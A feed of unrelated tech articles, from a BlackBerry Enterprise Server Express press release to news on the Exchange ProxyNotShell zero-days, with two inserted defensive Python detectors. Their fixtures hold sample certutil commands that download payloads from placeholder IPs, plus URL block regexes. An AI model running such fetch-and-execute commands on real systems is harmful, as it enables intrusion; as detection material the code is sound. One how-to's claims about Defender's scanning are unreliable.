RIM Introduces BlackBerry Enterprise Server Express

Waterloo, ON - Research In Motion (RIM) (NASDAQ: RIMM; TSX: RIM) today introduced BlackBerry® Enterprise Server Express - free new server software that wirelessly and securely synchronizes BlackBerry® smartphones with Microsoft® Exchange or Microsoft® Windows® Small Business Server.

The new BlackBerry Enterprise Server Express software will be provided free of charge in order to address two key market opportunities. First, the software offers economical advantages to small and mid-sized businesses (SMBs) that desire the enterprise-grade security and manageability of BlackBerry® Enterprise Server but don’t require all of its advanced features. Second, more and more consumers are purchasing BlackBerry smartphones and the free BlackBerry Enterprise Server Express software provides a cost-effective solution that enables IT departments to meet the growing demand from employees to be able to connect their personal BlackBerry smartphones to their work email.

BlackBerry Enterprise Server Express works with Microsoft Exchange 2010, 2007 and 2003 and Microsoft Windows Small Business Server 2008 and 2003 to provide users with secure, push-based, wireless access to email, calendar, contacts, notes and tasks, as well as other business applications and enterprise systems behind the firewall. Importantly, the new server software utilizes the same robust security architecture found in BlackBerry Enterprise Server.

"Today we are announcing an exciting new offering that further expands the market opportunity for the BlackBerry platform," said Mike Lazaridis, President and Co-CEO, Research In Motion. “In a marketplace where smartphones are becoming ubiquitous, BlackBerry Enterprise Server Express significantly raises the bar by providing a cost-effective solution that allows companies of all sizes to support enterprise-grade mobile connectivity for all employees without compromising security or manageability.”

With BlackBerry Enterprise Server Express connected to Microsoft Exchange or Microsoft Windows Small Business Server, BlackBerry smartphone users will be able to:

  • Wirelessly synchronize their email, calendar, contacts, notes and tasks
  • Manage email folders and search email on the mail server remotely
  • Book meetings and appointments, check availability and forward calendar attachments
  • Set an out-of-office reply
  • Edit Microsoft Word, Excel and PowerPoint files using Documents To Go®
  • Access files stored on the company network
  • Use mobile applications to access business systems behind the firewall

For IT administrators, BlackBerry Enterprise Server Express also offers the following:

  • Runs on the same physical or virtual server as the Microsoft mail server or on its own server. BlackBerry Enterprise Server Express is also certified for use with VMware ESX
  • Over 35 IT controls and policies, including the ability to remotely wipe a smartphone and enforce and reset passwords
  • A Web-based interface that allows remote administration and makes it easy to install the software, connect BlackBerry smartphones and apply usage policies

BlackBerry® Enterprise Server v5 continues to be the recommended solution for deployments that require additional security policies, monitoring features or high availability. BlackBerry Enterprise Server also continues to be required for certain other enterprise solutions such as BlackBerry® Mobile Voice System (for bringing desk phone functionality to BlackBerry smartphones), BlackBerry® Clients for Microsoft® Office Communications Server and IBM® Lotus® Sametime® (for enterprise instant messaging), IBM Lotus Connections (for enterprise social networking), IBM Lotus Quickr™ (for document sharing and collaboration), and Chalk® Pushcast Software (for corporate podcasting).

BlackBerry Enterprise Server Express is expected to be available as a free download in March. For more information, visit

About Research In Motion (RIM)                      
Research In Motion is a leading designer, manufacturer and marketer of innovative wireless solutions for the worldwide mobile communications market. Through the development of integrated hardware, software and services that support multiple wireless network standards, RIM provides platforms and solutions for seamless access to time-sensitive information including email, phone, SMS messaging, Internet and intranet-based applications. RIM technology also enables a broad array of third party developers and manufacturers to enhance their products and services with wireless connectivity. RIM’s portfolio of award-winning products, services and embedded technologies are used by thousands of organizations around the world and include the BlackBerry wireless platform, the RIM Wireless Handheld™ product line, software development tools, radio-modems and software/hardware licensing agreements. Founded in 1984 and based in Waterloo, Ontario, RIM operates offices in North America, Europe and Asia Pacific. RIM is listed on the NASDAQ Stock Market (NASDAQ: RIMM) and the Toronto Stock Exchange (TSX: RIM). For more information, visit or

Forward-looking statements in this news release are made pursuant to the "safe harbor" provisions of the United States Private Securities Litigation Reform Act of 1995. When used herein, words such as "intend" and similar expressions are intended to identify forward-looking statements. Forward-looking statements are based on assumptions made by and information available to Research In Motion Limited. Investors are cautioned that such forward-looking statements involve risks and uncertainties. Important factors that could cause actual results to differ materially from those expressed or implied by such forward-looking statements include, without limitation, possible product defects and product liability, risks related to international sales and potential foreign currency exchange fluctuations, the initiation or outcome of litigation, acts or potential acts of terrorism, international conflicts, significant fluctuations of quarterly operating results, changes in Canadian and foreign laws and regulations, continued acceptance of RIM's products, increased levels of competition, technological changes and the successful development of new products, dependence on third-party networks to provide services, dependence on intellectual property rights, and other risks and factors detailed from time to time in RIM's periodic reports filed with the United States Securities and Exchange Commission, and other regulatory authorities. RIM has no intention or obligation to update or revise any forward-looking statements, whether as a result of new information, future events or otherwise.

The BlackBerry and RIM families of related marks, images and symbols are the exclusive properties and trademarks of Research In Motion Limited. RIM, Research In Motion and BlackBerry are registered with the U.S. Patent and Trademark Office and may be pending or registered in other countries. All other brands, product names, company names, trademarks and service marks are the properties of their respective owners. RIM assumes no obligations or liability and makes no representation, warranty, endorsement or guarantee in relation to any aspect of any third party products or services.

Fri, 24 Nov 2017 05:20:00 -0600 text/html
Rumor: Microsoft still considering BlackBerry for possible acquisition

Is Microsoft still in a buying mood after announcing a deal Monday to acquire Nokia's smartphone business? That's the possibility that has been brought up in a new Bloomberg article, which claims that Microsoft could be interested in buying troubled mobile phone maker BlackBerry.

The article claims, via unnamed sources, that Microsoft "is keeping an eye" on BlackBerry for a possible deal. The Canadian company announced a few weeks ago it was looking at "strategic alternatives," which may include selling all or part of its business. Bloomberg's sources claim that there is still a large enterprise market for BlackBerry devices that could draw Microsoft's interest as it seeks to expand its smartphone business.

BlackBerry tried its best to relaunch itself in 2013, even going so far as to change its name from its previous title, Research in Motion. However, the launch of BlackBerry's new phones like the Z10, using its BlackBerry 10 OS, has been a sales failure, which helped Microsoft's Windows Phone, led by Nokia's Lumia devices, to overtake BlackBerry as the third most popular smartphone OS worldwide.

If a Microsoft-BlackBerry deal is made, it's possible it could be similar to Nokia's arrangement in that Microsoft buys out the hardware business from BlackBerry, while allowing the company to keep its BBM messaging service. Such a deal remains extremely unlikely, though it's no surprise Microsoft would monitor BlackBerry's status.

Source: Bloomberg

Fri, 23 Sep 2022 07:48:00 -0500 John Callaham en text/html
How to download Microsoft Defender for Windows 11/10

Microsoft’s in-house security app, Microsoft Defender, is available for download on Windows 11/10 computers. Microsoft first released a preview version of the app for Windows and Android devices, and users can now get the full version from the Microsoft Store. Today, we will look at how you can download the Windows Defender app on a Windows 11 or 10 PC.

How to download Microsoft Defender for Windows 11

Microsoft has the Windows Defender app integrated with Windows Security on Windows 11 and Windows 10. But the company has now released Microsoft Defender as a separate, standalone app, not just on Windows, but also on macOS and Android.

The process of downloading Microsoft Defender on Windows is the same as it is for downloading a third-party app. Here are the steps that you need to follow:

  1. Open up the search panel from the Taskbar
  2. Type “Store” and subsequently open the Windows Store
  3. Search for Microsoft Defender in the search bar present on its homepage. In doing so, you’ll be linked to the Microsoft Defender download page
  4. Now click on the “Get” button and wait till the download and installation are finished

Once it has been installed, you can open it from the Windows Store and log in with your Microsoft credentials. Users should note that Microsoft Defender necessitates having a Microsoft 365 Family or Microsoft 365 Personal subscription. You can find a ticker among the app details, to check whether your PC is compatible with this app, as well as some other additional information, like the fact that you can use Microsoft Defender on as many as 10 Windows devices at a time.

Microsoft Defender for Windows 11/10/Server can be downloaded here from the Microsoft Store. I repeat, Microsoft Defender requires a Microsoft 365 Family or Microsoft 365 Personal subscription.

NOTE: If Windows Security in Windows 11 is not opening or working, you should not download this one. You can reset Windows Security or reinstall Windows Defender via Settings.

We hope that this post made it easy for you to understand how you can download Microsoft Defender.

Read: How to enable or disable Windows Defender Firewall

Is Microsoft Windows Defender free?

If you don’t have an antivirus tool on your PC and are wondering if Microsoft Defender is a free, feasible option for you, then yes. The Microsoft Defender app is free to download from the Windows Store, although you are required to have a Microsoft 365 subscription for it, and the plans vary in price.

Do I need an antivirus if I have Windows Defender?

Another question many Microsoft Defender users on Windows have is whether they need antivirus software to work alongside Microsoft’s built-in PC protection. Since Microsoft Defender lacks endpoint protection and response and only goes through your emails, browser history, and cache data to look for cyber threats, which are also limited in number, it is advised that you run antivirus software while still using Microsoft Defender.

Wed, 24 Aug 2022 00:29:00 -0500 en-us text/html
How to make Outlook download all emails from server

Unwanted emails can take up a large amount of space on your computer. To avoid this, Microsoft Outlook has a setting that determines how much mail is available for download to your local PC. So, if your mail account is linked to Microsoft Exchange Server, as with Office 365 or Hotmail, the configured setting automatically limits the mail kept on your computer. If required, you can change this setting and make Outlook download all emails from the server.

If you’re using a mail service other than one based on Microsoft Exchange Server, such as Google, Outlook will simply ignore the setting and download all mail.

To download all emails from Exchange Server in Outlook:

  1. Connect to Microsoft Exchange via Link
  2. Change Exchange Account Settings.

1] Connect to Microsoft Exchange via Link


The simplest way to download all your emails from Exchange server is to scroll down to the bottom of a folder. If there are more items in that folder on the server, you’ll see a ‘Click here to view more on Microsoft Exchange’ link.

Hit the link and in seconds Outlook will begin to download all the emails to your computer.

2] Change Exchange Account Settings

For this, open Microsoft Outlook and go to the ‘File’ menu and choose ‘Account Settings’.

Next, select ‘Account Settings’ again from the drop-down menu.


When directed to the ‘Account Settings’ window, select your account and hit the ‘Change’ button.

Thereafter, in the ‘Offline Settings’ window that opens up, check if ‘Use Cached Exchange Mode’ is enabled. If yes, slide the ‘Mail to keep offline’ slider to the desired time limit you want.

By default, options ranging from 3 days up to 5 years and All are available. Choose ‘All’ if you would like Outlook to download all of your mail to your computer. Before choosing the ‘All’ option, make sure you have enough disk space available on your computer.

When done, click ‘Next’ and restart Outlook, when prompted.

Once the process is complete, you’ll notice a message at the bottom of Outlook saying ‘All folders are up to date’. This indicates that you have downloaded all your emails from Microsoft Exchange Server to your Outlook account.

Related: Leave a copy of messages on the server option missing in Outlook.

Hope you find this tip useful.

Tue, 16 Aug 2022 20:41:00 -0500 en-us text/html
Microsoft Updates Mitigation for Exchange Server Zero-Days

Microsoft today updated its mitigation measures for two recently disclosed and actively exploited zero-day vulnerabilities in its Exchange Server technology after researchers found its initial guidance could be easily bypassed.

Microsoft's original mitigation for the two vulnerabilities, CVE-2022-41040 and CVE-2022-41082, was to apply a blocking rule to a specific URL path using the URL Rewrite Module on IIS Server. According to the company, adding the string ".*autodiscover\.json.*\@.*Powershell.*" would help block known attack patterns against the vulnerabilities.

However, security researchers (including Vietnam-based security researcher Jang, Kevin Beaumont, and others) had noted that attackers can easily bypass the Microsoft-recommended mitigation to exploit the vulnerabilities. "The '@' in the Microsoft-recommended ".*autodiscover\.json.*\@.*Powershell.*" URL block mitigations for CVE-2022-41040 [and] CVE-2022-41082 seems unnecessarily precise, and therefore insufficient," security researcher Will Dormann said in a tweet. "Probably try ".*autodiscover\.json.*Powershell.*" instead," he wrote.

The CERT Coordination Center at Carnegie Mellon University appeared to echo the recommendation in its note about the vulnerabilities. "The recommended block pattern is ".*autodiscover\.json.*Powershell.*" (excluding the @ symbol) as a regular expression to prevent known variants of the #ProxyNotShell attacks," CERT said.

Updated Guidance 

On Tuesday, after more than a day of silence on the issue, Microsoft updated its guidance to reflect the change that the security researchers had suggested (.*autodiscover\.json.*Powershell.*). "Important updates have been made to the Mitigations section improving the URL Rewrite rule," Microsoft said. "Customers should review the Mitigations section and apply one of these updated mitigation options."
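An added example, not part of the original article or of Microsoft's guidance: a log audit that applies both block patterns quoted above to IIS W3C log lines and reports the requests that only the updated pattern catches, which are the ones worth reviewing first on servers that ran the original rule. The sample log is constructed, and the field layout, function names and case-insensitive matching (the URL Rewrite default) are assumptions.

```python
import re

# Block patterns exactly as quoted in the article. Assumption: matching is
# case-insensitive, mirroring the URL Rewrite module's default behaviour.
ORIGINAL_RULE = re.compile(r".*autodiscover\.json.*\@.*Powershell.*", re.IGNORECASE)
UPDATED_RULE = re.compile(r".*autodiscover\.json.*Powershell.*", re.IGNORECASE)

# Constructed sample in IIS W3C extended log format (documentation IP ranges,
# made-up requests). It is not real traffic and not taken from the article.
SAMPLE_LOG = """\
#Software: constructed sample
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2022-10-04 09:00:01 GET /owa/auth/logon.aspx - 203.0.113.10 200
2022-10-04 09:00:02 GET /autodiscover/autodiscover.json Email=user@example.test&Protocol=Powershell 203.0.113.11 200
2022-10-04 09:00:03 GET /autodiscover/autodiscover.json Protocol=Powershell 203.0.113.12 200
2022-10-04 09:00:04 GET /Autodiscover/Autodiscover.json Email=user@example.test&Protocol=POWERSHELL 203.0.113.13 200
2022-10-04 09:00:05 GET /autodiscover/autodiscover.json Email=user@example.test&Protocol=ActiveSync 203.0.113.14 200
2022-10-04 09:00:06 POST /powershell/ - 203.0.113.15 401
""".splitlines()


def classify(uri):
    """Say which of the two rules would have blocked this request URI."""
    updated = UPDATED_RULE.search(uri) is not None
    original = ORIGINAL_RULE.search(uri) is not None
    if original and updated:
        return "blocked_by_both"
    if updated:
        # The original pattern is strictly narrower, so this is the coverage gap.
        return "blocked_by_updated_only"
    return "not_blocked"


def audit_log(lines):
    """Parse W3C log lines and return one finding per request a rule matches.

    Column positions come from the '#Fields:' directive, so logs with a
    different field selection still parse. Rows seen before any directive,
    or with the wrong number of columns, are skipped rather than guessed at.
    """
    fields = []
    findings = []
    for raw in lines:
        line = raw.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split(" ")
        if len(values) != len(fields):
            continue
        row = dict(zip(fields, values))
        stem = row.get("cs-uri-stem")
        if stem is None:
            continue
        query = row.get("cs-uri-query", "-")
        # IIS logs the query string without '?', and '-' when it is empty.
        uri = stem if query == "-" else stem + "?" + query
        verdict = classify(uri)
        if verdict != "not_blocked":
            findings.append({
                "time": row.get("date", "") + " " + row.get("time", ""),
                "client": row.get("c-ip", ""),
                "status": row.get("sc-status", ""),
                "uri": uri,
                "verdict": verdict,
            })
    return findings


def coverage_gap(findings):
    """Requests the original '@' pattern would have let through."""
    return [f for f in findings if f["verdict"] == "blocked_by_updated_only"]


if __name__ == "__main__":
    results = audit_log(SAMPLE_LOG)
    for finding in results:
        print(finding["time"], finding["client"], finding["verdict"], finding["uri"])
    print("matched only by the updated rule:", len(coverage_gap(results)))
```

A match is only a reason to review the request: the constructed lines show that ordinary-looking Autodiscover queries can match either pattern.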

The blocking rule has been updated and enabled automatically for organizations that have enabled Microsoft's Exchange Emergency Mitigation Service. Microsoft has also updated a script that organizations could use to enable the URL Rewrite mitigation measure, and updated its step-by-step guidance on how to apply the rule for organizations that want to implement the mitigation manually. Microsoft has also strongly recommended that Exchange Server customers disable remote PowerShell access for nonadministrative users.

Microsoft originally released mitigation guidance on Sept. 30, following the public disclosure of CVE-2022-41040 and CVE-2022-41082, two vulnerabilities in Exchange Server that it said were being used in a limited number of targeted attacks since August 2022. The flaws affect on-premises versions of Microsoft Exchange Server 2013, 2016, and 2019 that are exposed to the Internet. The US Cybersecurity and Infrastructure Agency (CISA) has described the vulnerabilities as giving attackers a way to take control of an affected system.

A map of devices from the Shodan search engine that security researcher Beaumont generated this week shows tens of thousands of systems around the world that appear to be running vulnerable versions of Exchange Server. 

Microsoft said customers of Microsoft Exchange Online are protected and therefore don't need to take any action — an assertion that Beaumont has challenged. "Even if you're Exchange Online, if you migrated and kept a hybrid server (a requirement until very recently) you are impacted," Beaumont noted. Beaumont has labeled the vulnerabilities as "ProxyNotShell" because the exploit process and Microsoft's mitigations are very similar to that associated with last year's ProxyShell vulnerabilities in Exchange Server.

Microsoft is currently working on a fix for the two vulnerabilities.

Common Issue

"It is common for fixes to not be complete," says David Lindner, CISO at Contrast Security. "We have not tested the bypasses, but it is common for a back and forth to happen between exploit and fix until the true root cause is resolved." He points to the initial fixes for the Log4Shell vulnerability in Apache's Log4j logging framework as one example. "Over the course of a couple of weeks, there were multiple renditions trying to resolve the root of the issue," he notes.

CVE-2022-41040 is a server-side request forgery (SSRF) flaw that enables attackers to elevate privileges on a compromised system, and CVE-2022-41082 is a remote code execution flaw when PowerShell is remotely accessible to the attacker. Microsoft said it had detected a single threat actor using CVE-2022-41040 to remotely trigger CVE-2022-41082 and install a Web shell called Chopper on vulnerable systems that enabled them to steal data and conduct Active Directory reconnaissance. Chopper is a Web shell that has been previously associated with Chinese threat actors.

The flaws can be chained together in an attack, as happened with the threat actor that Microsoft observed, or used separately. In both instances, however, an attacker would need to be authenticated, even if it is only at the level of a standard user, to exploit the vulnerabilities, Microsoft said. Singapore-based security firm GTSC discovered the two flaws and, in coordination with Trend Micro's Zero Day Initiative, reported the bugs to Microsoft.

Tue, 04 Oct 2022 10:51:00 -0500 en text/html
Why Blackberry Stock (TSX:BB) Fell 16.5% in September

Let’s face it, September was a rough month. With the TSX falling 4.6%, all stocks were fighting a losing tape. Blackberry Ltd. (TSX:BB)(NYSE:BB) stock was no different. In fact, as usual, it was more volatile than most. At the end of the day, Blackberry stock fell 16.5% in September as the markets fell victim to an increasingly unfavourable macroeconomic environment.

Rising rates are not good for anyone, especially the higher risk companies with a lot of potential but no earnings – like Blackberry.

Blackberry stock (BB) reels as investors grow impatient waiting for growth

At the end of September, Blackberry reported its second quarter, fiscal 2023 results. They were not what we would have hoped for. In fact, its net loss of $0.05 per share reminded us that Blackberry still has a long way to go to become what we think it can become.  But the CEO did offer glimmers of hope on the conference call.

For example, billings in Blackberry’s cybersecurity business were promising. The market is dominated by Microsoft, but feedback from customers is encouraging. Apparently, Blackberry’s level of security protection is unmatched, even by the likes of Microsoft.

Moving on to Blackberry’s embedded systems (Internet of Things) segment. This is where the massive potential is. This segment currently accounts for 30% of Blackberry’s total revenue – and it’s where the real growth is expected. In the quarter, revenue increased 28% as demand was strong.

The bottom line here is that the headline numbers are still dismal for Blackberry. Its latest quarter is further evidence of this. This is what has dragged down Blackberry’s stock price once again in September.


Yet, if we dig a little deeper, I think we will come out of this feeling much more bullish.

Analysts reduce their ratings and target prices on Blackberry stock

Visibility – it’s what we like to see in a company that we invest in. But sometimes, there’s little visibility. And sometimes, we can only have faith and conviction in our investment thesis. This is the case for Blackberry. Markets are uncertain and we have limited visibility into Blackberry’s future. This combination does not bode well for predictability and confidence.

So it’s not surprising that analysts have been reducing their target prices and ratings on Blackberry stock in September. For example, RBC lowered its target price for Blackberry to $6.00 from $6.50. Likewise, Canaccord Genuity lowered its target price to $5.00 from $6.00.

While these moves are understandable given the price action in the market today, it feels sort of backward-looking and reactionary to me. Because in reality, Blackberry is closer to success than it has ever been. For example, IVY, which is Blackberry’s partnership with Amazon Web Services, is seeing strong demand. The pilots are going well and Blackberry hopes that it will be in production by the end of the year. This software is changing cars as we know them, introducing different apps and safety features into our driving experience.

Factoring in ultra low expectations

Sentiment in the market in general deteriorated in September. Negative sentiment had already taken hold of Blackberry stock, and this just intensified the downward pressure. But the one thing that speaks volumes to me is the fact that Blackberry’s second quarter results, bad as they were, came in above expectations. This implies that the expectations built into Blackberry stock (valuation) are not high enough.

While there were plenty of reasons for Blackberry’s stock price (BB) to be down in September, there are also plenty of reasons to believe that things will turn around in October and beyond.

The post Why Blackberry Stock (TSX:BB) Fell 16.5% in September appeared first on The Motley Fool Canada.


Fool contributor Karen Thomas owns shares of Blackberry Ltd. The Motley Fool has no position in any of the stocks mentioned. The Motley Fool has a disclosure policy.

Thu, 06 Oct 2022 03:30:00 -0500 en-CA text/html
Microsoft: Two New 0-Day Flaws in Exchange Server

Microsoft Corp. is investigating reports that attackers are exploiting two previously unknown vulnerabilities in Exchange Server, a technology many organizations rely on to send and receive email. Microsoft says it is expediting work on software patches to plug the security holes. In the meantime, it is urging a subset of Exchange customers to enable a setting that could help mitigate ongoing attacks.

In customer guidance released Thursday, Microsoft said it is investigating two reported zero-day flaws affecting Microsoft Exchange Server 2013, 2016, and 2019. CVE-2022-41040 is a Server-Side Request Forgery (SSRF) vulnerability that can enable an authenticated attacker to remotely trigger the second zero-day vulnerability, CVE-2022-41082, which allows remote code execution (RCE) when PowerShell is accessible to the attacker.

Microsoft said Exchange Online has detections and mitigation in place to protect customers. Customers using on-premises Microsoft Exchange servers are urged to review the mitigations suggested in the security advisory, which Microsoft says should block the known attack patterns.

Vietnamese security firm GTSC on Thursday published a writeup on the two Exchange zero-day flaws, saying it first observed the attacks in early August being used to drop “webshells.” These web-based backdoors offer attackers an easy-to-use, password-protected hacking tool that can be accessed over the Internet from any browser.

“We detected webshells, mostly obfuscated, being dropped to Exchange servers,” GTSC wrote. “Using the user-agent, we detected that the attacker uses Antsword, an active Chinese-based opensource cross-platform website administration tool that supports webshell management. We suspect that these come from a Chinese attack group because the webshell codepage is 936, which is a Microsoft character encoding for simplified Chinese.”

GTSC’s advisory includes details about post-compromise activity and related malware, as well as steps it took to help customers respond to active compromises of their Exchange Server environment. But the company said it would withhold more technical details of the vulnerabilities for now.

In March 2021, hundreds of thousands of organizations worldwide had their email stolen and multiple backdoor webshells installed, all thanks to four zero-day vulnerabilities in Exchange Server.

Granted, the zero-day flaws that powered that debacle were far more critical than the two detailed this week, and there are no signs yet that exploit code has been publicly released (that will likely change soon). But part of what made last year’s Exchange Server mass hack so pervasive was that vulnerable organizations had little or no advance notice on what to look for before their Exchange Server environments were completely owned by multiple attackers.

Microsoft is quick to point out that these zero-day flaws require an attacker to have a valid username and password for an Exchange user, but this may not be such a tall order for the hackers behind these latest exploits against Exchange Server.

Steven Adair is president of Volexity, the Virginia-based cybersecurity firm that was among the first to sound the alarm about the Exchange zero-days targeted in the 2021 mass hack. Adair said GTSC’s writeup includes an Internet address used by the attackers that Volexity has tied with high confidence to a China-based hacking group that has recently been observed phishing Exchange users for their credentials.

In February 2022, Volexity warned that this same Chinese hacking group was behind the mass exploitation of a zero-day vulnerability in the Zimbra Collaboration Suite, which is a competitor to Microsoft Exchange that many enterprises use to manage email and other forms of messaging.

If your organization runs Exchange Server, please consider reviewing the Microsoft mitigations and the GTSC post-mortem on their investigations.

Thu, 29 Sep 2022 11:59:00 -0500 en-US text/html
Microsoft mitigation for new Exchange Server zero-day exploits can be bypassed

Attackers are currently exploiting two unpatched vulnerabilities to remotely compromise on-premises Microsoft Exchange servers. Microsoft confirmed the flaws late last week and published mitigation advice until a complete patch can be developed, but according to reports, the proposed mitigation can be easily bypassed.

The new vulnerabilities were discovered in early August by a Vietnamese security company called GTSC while performing security monitoring and incident response for a customer whose servers were attacked. Initially, the GTSC researchers thought they might be dealing with a ProxyShell exploit based on the malicious requests seen in the server logs which looked similar. ProxyShell is an attack that chains three Exchange vulnerabilities and was patched last year.

However, the incident response team quickly realized that the compromised Exchange servers where attackers had obtained remote code execution capabilities were fully up to date, which meant this couldn’t be ProxyShell. After reverse engineering confirmed they were dealing with previously unknown vulnerabilities, they submitted a report to Trend Micro’s Zero Day Initiative (ZDI) program whose analysts confirmed them and shared them with Microsoft.

The new attack exploits two vulnerabilities

The new attack chain exploits two new flaws that Microsoft now tracks as CVE-2022-41040 and CVE-2022-41082. The first one is a server-side request forgery (SSRF) issue that enables an authenticated attacker to trigger the second vulnerability. This in turn allows remote code execution via PowerShell. The flaws affect Microsoft Exchange Server 2013, Exchange Server 2016 and Exchange Server 2019, while Microsoft Exchange Online already has detections and mitigations in place. “It should be noted that authenticated access to the vulnerable Exchange Server is necessary to successfully exploit either vulnerability,” Microsoft said in its advisory.

In the attacks seen by GTSC across multiple customers, the attackers used the exploit to deploy web shells – backdoor scripts – masquerading as legitimate Exchange files such as RedirSuiteServiceProxy.aspx. They then proceeded to deploy credential dumping malware to steal credentials from the compromised servers. Based on the choice of web shells and other artifacts left behind, the researchers suspect the attackers are Chinese.

According to a separate report by Cisco Talos, the attackers used Antsword, a popular Chinese language-based open-source web shell; SharPyShell, an ASP.NET-based web shell; and China Chopper. They also abuse certutil, a legitimate utility, to download and deploy implants.
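A defender-side sketch of how the certutil download behaviour Talos describes could be flagged in process-creation telemetry; it is an added example, not code from GTSC, Talos or Microsoft. The event field names, the sample events and the rule that a w3wp.exe parent raises severity are assumptions made for illustration.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Constructed process-creation events; field names are assumptions that
# loosely follow Sysmon Event ID 1 (Image, OriginalFileName, ParentImage).
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\certutil.exe", "original_name": "CertUtil.exe",
     "cmdline": r"certutil -urlcache -split -f http://203.0.113.10/a.txt C:\Users\Public\a.dll"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\Public\cu.exe", "original_name": "CertUtil.exe",
     "cmdline": r"cu.exe /URLCACHE /f https://198.51.100.7/x.bin x.bin"},
    {"parent": r"C:\Windows\System32\mmc.exe",
     "image": r"C:\Windows\System32\certutil.exe", "original_name": "CertUtil.exe",
     "cmdline": r"certutil -verify C:\certs\server.cer"},
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\inetsrv\appcmd.exe", "original_name": "appcmd.exe",
     "cmdline": "appcmd list sites"},
]

# certutil accepts "-" or "/" before a verb; both verbs below can fetch remote content.
DOWNLOAD_FLAG = re.compile(r"(?<!\S)[-/](urlcache|verifyctl)\b", re.IGNORECASE)
URL = re.compile(r"\b(?:https?|ftp)://[^\s\"']+", re.IGNORECASE)

def is_certutil(event):
    """Match on file name or embedded original name, so renamed copies still count."""
    names = {basename(event["image"]).lower(), event.get("original_name", "").lower()}
    return "certutil.exe" in names

def flag_certutil_downloads(events):
    """Return one finding per certutil invocation that carries a download verb and a URL."""
    findings = []
    for idx, ev in enumerate(events):
        if not is_certutil(ev):
            continue
        flag = DOWNLOAD_FLAG.search(ev["cmdline"])
        url = URL.search(ev["cmdline"])
        if not (flag and url):
            continue  # ordinary certificate work, e.g. "certutil -verify"
        # Assumption: a child of the IIS worker process suggests a web shell issued it.
        from_iis = basename(ev["parent"]).lower() == "w3wp.exe"
        findings.append({"index": idx, "url": url.group(0),
                         "renamed": basename(ev["image"]).lower() != "certutil.exe",
                         "severity": "high" if from_iis else "medium"})
    return findings
```

Running `flag_certutil_downloads(SAMPLE_EVENTS)` flags the first two constructed events and ignores the routine certificate check and the unrelated IIS child process.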

Copyright © 2022 IDG Communications, Inc.

Tue, 11 Oct 2022 06:53:00 -0500

Microsoft Confirms Two Zero Day Exploits of Exchange Server

Exchange Server products are potentially subject to two newly disclosed "zero-day" vulnerabilities that are under exploit, Microsoft acknowledged in a Thursday announcement.

The two vulnerabilities are combined as part of remote code execution (RCE) attacks. Microsoft described these common vulnerabilities and exposures (CVEs) as follows:

  • CVE-2022-41040, a Server-Side Request Forgery vulnerability, and
  • CVE-2022-41082, which allows RCE "when PowerShell is accessible to the attacker."

The two vulnerabilities are present in "Microsoft Exchange Server 2013, 2016 and 2019." Attackers need the credentials of a user to carry out the exploits.

Concerning the Exchange Server vulnerabilities, Microsoft is aware of "limited targeted attacks":

At this time, Microsoft is aware of limited targeted attacks using the two vulnerabilities to get into users' systems. In these attacks, CVE-2022-41040 can enable an authenticated attacker to remotely trigger CVE-2022-41082. It should be noted that authenticated access to the vulnerable Exchange Server is necessary to successfully exploit either of the two vulnerabilities.

Exchange Online Not Vulnerable?
Microsoft claimed that "Exchange Online customers do not need to take any action," but many organizations using Exchange Online also may be using Exchange Server for administrative purposes, which once had been a requirement.

The notion that Exchange Online users are vulnerable, too, was highlighted by security researcher Kevin Beaumont, formerly of Microsoft, who dubbed the two vulnerabilities "ProxyNotShell" in his blog post:

Microsoft say "Microsoft Exchange Online Customers do not need to take any action." This is false -- if you run Exchange hybrid servers, a standard part of Microsoft Exchange Online migration, they are vulnerable. Thousands of orgs present these to the internet, too.

Microsoft had announced back in April that it was dropping the Exchange Server management requirement for Exchange Online users with Cumulative Update 12 for Windows Server 2019. However, Microsoft has also suggested that Exchange Online users "may not want to decommission Exchange Servers from on-premises," too, so it's a murky scenario.

Mitigation Steps for Now
Microsoft offered "mitigation" steps that Exchange Server users can implement to "block known attack patterns," as described in the Thursday announcement.

Mitigation advice also came from security solutions company GTSC, which first blew the whistle on the attacks by describing the zero-day Exchange Server flaws in this post. GTSC speculated that the exploits were being used by a "Chinese attack group."

Microsoft acknowledged that it fixed an early glitch in its mitigation advice, vs. GTSC's advice, in the comments section of this announcement. "MSRC blog post has now been edited to specify 'Regular Expressions' instead of 'Wildcards,'" wrote Nino Bilic of Microsoft. It seemed to be a goof on Microsoft's part.

Microsoft is working on a patch for the security issues, but offered its mitigation steps in the meantime "to help customers protect themselves from these attacks." Microsoft claimed that the mitigation has "no known impact to Exchange functionality if the URL Rewrite module is installed as recommended." It also recommended blocking two ports from using Remote PowerShell.

Microsoft's usual security tools appear able to detect only the post-exploitation malware used with these attacks.

Similar to ProxyShell
The exploits apparently follow a similar pattern to ProxyShell attacks of last year, but require authenticated access.

That circumstance led to initial confusion about whether GTSC was actually describing zero-day attacks, although Microsoft has essentially confirmed them as such. Early discussion on the ProxyShell attack similarities was highlighted by Beaumont, who offered this very informative Sept. 30 Twitter thread on the topic.

Beaumont also advised organizations to "stop representing OWA to the internet until there is a patch," presumably referring to the Outlook Web App. This advice isn't mentioned by Microsoft, but it was echoed by Jon Hencinski, vice president of security operations at security solutions company Expel.

After following Microsoft's mitigation advice, organizations should "review your Exchange configuration to determine if Outlook Web App (OWA) is exposed to the internet," Hencinski commented via e-mail. "If it's exposed, determine if it's necessary for any current business needs and evaluate the risk."

Hencinski added that "services like Shodan and Censys can help determine what services are publicly accessible."

Other security researchers, such as Claire Tills, senior research engineer at security solutions firm Tenable, affirmed that the Exchange Server vulnerabilities appear to be "variants of ProxyShell -- a chain of vulnerabilities disclosed in late 2021." Tills offered the following observation, via e-mail:

The key difference is that both these latest vulnerabilities, CVE-2022-41040 and CVE-2022-41082, require authentication where ProxyShell did not. Microsoft has confirmed the vulnerabilities but, at this time, we're still waiting on patches. Once those are available, organizations should deploy them with urgency. Microsoft and GTSC have both offered mitigation guidance for organizations to consider until patches have been released. ProxyShell was and remains one of the most exploited attack chains released in 2021.

